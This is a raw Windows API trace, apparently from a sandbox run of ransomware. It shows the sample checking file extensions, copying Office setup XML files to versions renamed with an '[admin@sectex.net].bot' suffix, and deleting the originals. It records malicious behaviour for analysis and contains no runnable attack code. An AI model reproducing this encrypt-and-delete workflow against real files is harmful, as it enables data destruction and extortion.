	[0038.138] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0038.138] lstrlenW (lpString=".xlsx") returned 5
	[0038.138] lstrcmpiW (lpString1=".xlsx", lpString2="O.CHM") returned -1
	[0038.138] lstrlenW (lpString=".ppt") returned 4
	[0038.138] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0038.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103
	[0038.138] lstrlenW (lpString=".zip") returned 4
	[0038.138] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0038.138] lstrlenW (lpString=".rar") returned 4
	[0038.138] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0038.138] lstrlenW (lpString=".bz2") returned 4
	[0038.138] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0038.138] lstrlenW (lpString=".7z") returned 3
	[0038.138] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0038.138] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103
	[0038.138] lstrlenW (lpString=".dbf") returned 4
	[0038.138] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0038.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103
	[0038.139] lstrlenW (lpString=".1cd") returned 4
	[0038.139] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0038.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 103
	[0038.139] lstrlenW (lpString=".jpg") returned 4
	[0038.139] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0038.139] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0038.139] lstrlenW (lpString="OneNoteMUI.XML") returned 14
	[0038.139] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0038.139] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1606) returned 1
	[0038.139] CloseHandle (hObject=0x1b0) returned 1
	[0038.139] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml")) returned 0x20
	[0038.139] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0038.139] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0038.140] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.140] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.140] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0038.237] GetLastError () returned 0x0
	[0038.237] ReadFile (in: hFile=0x1b0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x646, lpOverlapped=0x0) returned 1
	[0038.255] WriteFile (in: hFile=0x1d0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x650, lpOverlapped=0x0) returned 1
	[0038.256] ReadFile (in: hFile=0x1b0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0038.256] WriteFile (in: hFile=0x1d0, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0038.256] SetEndOfFile (hFile=0x1d0) returned 1
	[0038.256] CloseHandle (hObject=0x1d0) returned 1
	[0038.259] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.259] SetEndOfFile (hFile=0x1b0) returned 1
	[0038.259] CloseHandle (hObject=0x1b0) returned 1
	[0038.260] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0038.260] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml")) returned 1
	[0038.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108
	[0038.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108
	[0038.260] lstrlenW (lpString=".doc") returned 4
	[0038.260] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.260] lstrlenW (lpString=".docx") returned 5
	[0038.260] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0038.260] lstrlenW (lpString=".pdf") returned 4
	[0038.260] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.260] lstrlenW (lpString=".xls") returned 4
	[0038.260] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.260] lstrlenW (lpString=".xlsx") returned 5
	[0038.260] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0038.260] lstrlenW (lpString=".ppt") returned 4
	[0038.261] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108
	[0038.261] lstrlenW (lpString=".zip") returned 4
	[0038.261] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.261] lstrlenW (lpString=".rar") returned 4
	[0038.261] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.261] lstrlenW (lpString=".bz2") returned 4
	[0038.261] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.261] lstrlenW (lpString=".7z") returned 3
	[0038.261] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108
	[0038.261] lstrlenW (lpString=".dbf") returned 4
	[0038.261] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108
	[0038.261] lstrlenW (lpString=".1cd") returned 4
	[0038.261] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108
	[0038.261] lstrlenW (lpString=".jpg") returned 4
	[0038.261] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108
	[0038.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108
	[0038.261] lstrlenW (lpString=".doc") returned 4
	[0038.261] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.261] lstrlenW (lpString=".docx") returned 5
	[0038.261] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0038.261] lstrlenW (lpString=".pdf") returned 4
	[0038.261] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.261] lstrlenW (lpString=".xls") returned 4
	[0038.261] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.261] lstrlenW (lpString=".xlsx") returned 5
	[0038.261] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0038.261] lstrlenW (lpString=".ppt") returned 4
	[0038.261] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108
	[0038.262] lstrlenW (lpString=".zip") returned 4
	[0038.262] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.262] lstrlenW (lpString=".rar") returned 4
	[0038.262] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.262] lstrlenW (lpString=".bz2") returned 4
	[0038.262] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.262] lstrlenW (lpString=".7z") returned 3
	[0038.262] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108
	[0038.262] lstrlenW (lpString=".dbf") returned 4
	[0038.262] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108
	[0038.262] lstrlenW (lpString=".1cd") returned 4
	[0038.262] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108
	[0038.262] lstrlenW (lpString=".jpg") returned 4
	[0038.262] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.262] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0038.262] lstrlenW (lpString="OutlookMUI.XML") returned 14
	[0038.262] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0038.262] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=3186) returned 1
	[0038.263] CloseHandle (hObject=0x1b0) returned 1
	[0038.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml")) returned 0x20
	[0038.263] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0038.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0038.263] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.263] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8
	[0038.265] GetLastError () returned 0x0
	[0038.265] ReadFile (in: hFile=0x1b0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0xc72, lpOverlapped=0x0) returned 1
	[0038.266] WriteFile (in: hFile=0x1c8, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xc80, lpOverlapped=0x0) returned 1
	[0038.267] ReadFile (in: hFile=0x1b0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0038.267] WriteFile (in: hFile=0x1c8, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0038.267] SetEndOfFile (hFile=0x1c8) returned 1
	[0038.267] CloseHandle (hObject=0x1c8) returned 1
	[0038.268] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.269] SetEndOfFile (hFile=0x1b0) returned 1
	[0038.269] CloseHandle (hObject=0x1b0) returned 1
	[0038.269] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0038.270] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml")) returned 1
	[0038.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108
	[0038.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108
	[0038.270] lstrlenW (lpString=".doc") returned 4
	[0038.270] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.270] lstrlenW (lpString=".docx") returned 5
	[0038.270] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0038.270] lstrlenW (lpString=".pdf") returned 4
	[0038.270] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.270] lstrlenW (lpString=".xls") returned 4
	[0038.270] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.270] lstrlenW (lpString=".xlsx") returned 5
	[0038.270] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0038.270] lstrlenW (lpString=".ppt") returned 4
	[0038.270] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108
	[0038.270] lstrlenW (lpString=".zip") returned 4
	[0038.270] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.270] lstrlenW (lpString=".rar") returned 4
	[0038.270] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.270] lstrlenW (lpString=".bz2") returned 4
	[0038.270] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.270] lstrlenW (lpString=".7z") returned 3
	[0038.270] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108
	[0038.270] lstrlenW (lpString=".dbf") returned 4
	[0038.270] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.270] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108
	[0038.271] lstrlenW (lpString=".1cd") returned 4
	[0038.271] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108
	[0038.271] lstrlenW (lpString=".jpg") returned 4
	[0038.271] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108
	[0038.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108
	[0038.271] lstrlenW (lpString=".doc") returned 4
	[0038.271] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.271] lstrlenW (lpString=".docx") returned 5
	[0038.271] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0038.271] lstrlenW (lpString=".pdf") returned 4
	[0038.271] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.271] lstrlenW (lpString=".xls") returned 4
	[0038.271] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.271] lstrlenW (lpString=".xlsx") returned 5
	[0038.271] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0038.271] lstrlenW (lpString=".ppt") returned 4
	[0038.271] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108
	[0038.271] lstrlenW (lpString=".zip") returned 4
	[0038.271] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.271] lstrlenW (lpString=".rar") returned 4
	[0038.271] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.271] lstrlenW (lpString=".bz2") returned 4
	[0038.271] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.271] lstrlenW (lpString=".7z") returned 3
	[0038.271] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108
	[0038.271] lstrlenW (lpString=".dbf") returned 4
	[0038.271] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.271] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108
	[0038.271] lstrlenW (lpString=".1cd") returned 4
	[0038.271] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.272] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML") returned 108
	[0038.272] lstrlenW (lpString=".jpg") returned 4
	[0038.272] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.272] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0038.272] lstrlenW (lpString="SETUP.XML") returned 9
	[0038.272] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0038.273] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=4207) returned 1
	[0038.273] CloseHandle (hObject=0x1b0) returned 1
	[0038.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml")) returned 0x20
	[0038.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0038.273] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0038.273] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.273] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.273] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8
	[0038.273] GetLastError () returned 0x0
	[0038.273] ReadFile (in: hFile=0x1b0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x106f, lpOverlapped=0x0) returned 1
	[0038.275] WriteFile (in: hFile=0x1c8, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x1070, lpOverlapped=0x0) returned 1
	[0038.276] ReadFile (in: hFile=0x1b0, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0038.276] WriteFile (in: hFile=0x1c8, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0038.276] SetEndOfFile (hFile=0x1c8) returned 1
	[0038.276] CloseHandle (hObject=0x1c8) returned 1
	[0038.277] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.277] SetEndOfFile (hFile=0x1b0) returned 1
	[0038.278] CloseHandle (hObject=0x1b0) returned 1
	[0038.278] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0038.278] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml")) returned 1
	[0038.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103
	[0038.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103
	[0038.278] lstrlenW (lpString=".doc") returned 4
	[0038.278] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.278] lstrlenW (lpString=".docx") returned 5
	[0038.278] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0038.278] lstrlenW (lpString=".pdf") returned 4
	[0038.278] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.278] lstrlenW (lpString=".xls") returned 4
	[0038.278] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.278] lstrlenW (lpString=".xlsx") returned 5
	[0038.278] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0038.278] lstrlenW (lpString=".ppt") returned 4
	[0038.278] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103
